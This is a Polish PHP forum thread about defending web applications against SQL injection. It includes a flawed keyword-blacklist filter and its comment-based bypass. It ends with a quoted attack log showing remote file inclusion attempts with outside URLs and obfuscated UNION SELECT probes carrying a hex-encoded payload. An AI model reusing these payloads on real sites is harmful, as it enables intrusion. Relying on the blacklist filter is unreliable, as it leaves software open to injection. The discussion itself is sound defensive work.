Forum PHP.pl

:-) No to jasne, że można :-) ale chodzi mi o zabezpieczenie przed wpisywaniem przez 'szarego' użytkownika eksperymantalnych wartości w pasku url :-)

np. jeżeli jesteśmy na stronce https://sklep.jakistamsklep.pl/lista_1.php?...&toitamto=2

to już nie będzie można sobie wpisać wartosci wyswietl i toitamto ręcznie po zastosowaniu tego o czym mowa :-)





A czy ktoś się orientuje czy w zapobieganiu MySql Injection ma jakieś znaczenie to, czy treść zapytania MySql jest zakończona w php średnikiem ?

czyli

[PHP] pobierz, plaintext 
<?php
$wynik=mysql_query( "select name from users;" );
?>
[PHP] pobierz, plaintext 

zamiast

[PHP] pobierz, plaintext 
<?php
$wynik=mysql_query( "select name from users" );
?>
[PHP] pobierz, plaintext 

?

a od kiedy zapytanie w mysql_query() konczy sie srednikiem?

zapytania MySql kończy się średnikiem :-) a w mysql_query teoretycznie też można więc ciekawi mnie czy ten średnik w mysql_query mógłby np. czemuś zapobiec (np. dołączeniu UNION SELECT) czy raczej nie :-) Zwyczjnie nie wiem to pytam :-)

Ten post edytował mlattari 28.02.2009, 13:40:55

";" oznacza ze dane zapytanie zostalo zakonczone, w przypadku "zwyklych" selektow, insertow etc nie ma znaczenia czy dasz ; czy nie

co do uzycia ";" jako obranie przed union select to sprawa jest jasna (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) wszystko co wstrzykujesz leci przed ; tak wiec nic on nie da (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

no racja... ja jakoś lubię te średniki tam wstawiać ale to chyba zboczenie od klienta mysql.... :-|

A czy ktoś może wie czy jest możliwy atak MySql Injection na zmienne przekazywane przez $_POST[] poprzez listy wyboru typu <SELECT>, w których są ustawione sztywne wartości. Czy da się jakoś manewrować tymi zmiennymi, tak żeby udało się tam coś wstrzyknąć? Chodzi mi o to czy też trzeba zabezpieczać się w przypadku zastosowania list wyboru typy <SELECT> ze sztywnymi wartościami.
Np. <option selected>1: Wybór1</option>. W takim przypadku odcinam sobie to co przed znakiem : czyli 1. Czy ktoś byłby w stanie coś tam podpiąć żeby i to trafiło do MySql?

Ten post edytował mlattari 1.03.2009, 18:41:37

trzeba, kod HTML może być dowolnie zmodyfikowany, odpal sobie FireBug`a ( wtyczka do FireFoxa) i popatrz sobie jak latwo mozna zmanipulowac kod HTML

hmm dzięki! to dobrze wiedzieć!

Te wartości, które masz stałe, np. tak jak w przypadku tej jedynki najłatwiej obsłużyć przez switch'a - nie ma możliwości innych wartości, bo PHP to wybije na default'ową wartość (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg) Oczywiście wada jest taka, że jest to bezpośrednio w kodzie, co zmniejsza elastyczność, ale coś za coś mówią (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

Nie wiem jak wam, ale jak przepuściłem przez mój system login wyszło:



I myślę że to dobry sposób, jezei doda się wszystkie komendy sql (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

[PHP] pobierz, plaintext 
<?php
$niebezpiecznyciag = "', haslo='nowe_haslo' WHERE id = 1 ALTER DATBASE";
 
//KROK 1
$trochebezpiecznyciag = addslashes($niebezpiecznyciag);
echo $trochebezpiecznyciag.'<br>';
 
//KROK 2
$zle = array('WHERE', 'LIKE', 'INSERT', 'DELETE', 'FROM', 'ALTER');
if(strstr($trochebezpiecznyciag, 'WHERE') || strstr($ciag, 'LIKE') || strstr($ciag, 'INSERT') || strstr($ciag, 'DELETE') || strstr($ciag, 'FROM') || strstr($ciag, 'ALTER')){
    $bezpiecznyciag = str_replace($zle, '', $trochebezpiecznyciag);
    //jezeli wykryta proba wlamania caly ciag jest podejrzany 
    $bardzobezpiecznyciag = sha1($bezpiecznyciag);
    echo $bezpiecznyciag.'<br>';
    echo $bardzobezpiecznyciag;
  
}
?>
[PHP] pobierz, plaintext 

Jeżeli zostanie wykryta jakakolwiek proba wlamania sie to konserwujemy caly ciag. Mozna tez uzyc czego innego i potem to odmieszać i sprawdzic co uzyszkodnicy chieli nam zrobic.

I mam pytanie czy przy if, nie można jakos inaczej porownac? if strstr(ciag, tablica) (IMG:http://forum.php.pl/style_emoticons/default/questionmark.gif)

Ten post edytował thomson89 21.03.2009, 19:53:41

A po co tak wydziwiać? Jeśli stringa trzymasz w cudzysłowach/apostrofach to MySQL nawet nie spojrzy na żadne słowo kluczowe.

in_array" title="Zobacz w manualu PHP" target="_manual

@Mephistofeles, jak ktos tam kilka stron wcześniej powiedział: Trzeba przygotować się na najgorsze.

z in array nie dziala

[PHP] pobierz, plaintext 
<?php
if(in_array($trochebezpiecznyciag, $zlo))
?>
[PHP] pobierz, plaintext 

to nie znajduje ciagu where i warunek nie spełniony...

Ten post edytował thomson89 21.03.2009, 20:29:28

To najlepiej siedzieć przy kompie i każde żądanie użytkownika przeglądać osobiście.

Przeczytaj cały ten wątek, od początku, dopiero potem zadawaj pytania. (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif)

@thomson89 kiedys na swoim rozowym blogasku pisalem, ze w wiekszosci przypadkow pisanie wlasnego systemu filtracji nie ma sensu, bo zawsze cos sie spieprzy ;-) co prawda nie czytalem dokladnie Twojego kodu, ale smiem twierdzic ze "SELECT * FROM tab;" potraktuje jako probe SQLi, a co z "SELECT * FR/**/OM tab;" ?

przy okazji mozesz rzucic okiem na http://www.beldzio.com/zabezpieczenie-mlek...-miodem-plynace

Jakie sa mozliwości włamania na mojej stronie?
Nie mam zadnego formularza rejestracji, uzytkownik moze jedynie przegladac swoj profil bez edycji danych. Jest to strona z przedmiotu logistyka gdzie umieszczone sa testy sprawdzajaca wiedze z tej problematyki. W polach do logowania uzytkownik moze podawac tylko liczy i litery zadnych kropek itp. Uzywam md5 do hashowania hasel. W kazdej stronie sa wstawione warunki na temat czy osoba ma prawo zagladania do danej strony. Jedyne miejsce gdzie uzytkownik moze cos wspisac to formularz kontaktowy do wysylania maili. Gdy jestemy zalogowani ustawiana jest zmienna $_SESSION['login'] a gdy admin to $_SESSION['admin']

nie widzac kodu zbyt wiele nie da sie powiedziec (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) jesli filtrujesz wszystko co nalezy i jak nalezy powinno byc ok

pamietaj, że istnieje zatruwanie sesji, więc nie opieraj się tylko i wyłącznei na istnieniu danej zmiennej sesyjnej, możesz sprawdzić ip itp.

A czy najlepszym zabezpieczeniem nie byłoby sprawdzenie czy ciąg zawiera znak " ; " (IMG:http://forum.php.pl/style_emoticons/default/questionmark.gif)

Tak? To ja wpiszę login:


(IMG:http://forum.php.pl/style_emoticons/default/tongue.gif)

Przeczytaj, co do tej pory się naprodukowaliśmy, bo zaczyna wątek kołować.

Mam pytanie, przepraszam, jeśli w złym wątku, ale wydaje mi się, że na temat.
Ostatnio na moją stronę próbowano dokonać ataku tego typu (sądzę, że się nie powiodło). Nie rozumiem, co ten ktoś/coś próbował zrobić. Gdyby ktoś mógł mi to wytłumaczyć, to może byłoby to z pożytkiem dla innych (ilustracja do tematu)?
Wyglądało to tak (dane mam ze sprytnego skryptu rejestrującego wejścia na stronę - dotyczy więc GET)
Najpierw ktoś w adresie próbował w jedną ze zmiennych wstawić adres (nie będę mu robił reklamy, więc wyiksowałem)
moja_strona.pl?art=newsy&k=http://www.xxxxxxxxx.com/layout/oxiqade/jokihi/
Potem próbował tak
moja_strona.pl?art=newsy&k=3/**/union/**/select/
**/0x6A7573745F615F746573745F315F305F305F736C6173685F315F3C3F706870206563686F286D64
528226A7573745F615F746573742229293B6563686F2840756E6C696E6B28222F6A6174657374362
7068702
Potem jeszcze kilkanaście takich prób, z tym, że przed tym dziwnym ciągiem dodawał coraz więcej null,
**/union/**/select/**/null,
...
/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
ull,null,null,null,null,null,null,null,null,null,
Potem zmienił taktykę, i dodawał nawias
?art=newsy&k=3) union select 0x6A7573745F615F746573745F315F305F315F6461736 bleble
potem trochę pochodził po stronie,
spróbował jeszcze z linkiem
?p=http://www.xxxxxxxxxxx.kz/templates_c/omoj/suju/
i sobie poszedł. Całośc trwała 3 minuty.
Czy to było niebezpieczne?
Mam nadzieję, że się zbytnio nie ośmieszam tym pytaniem.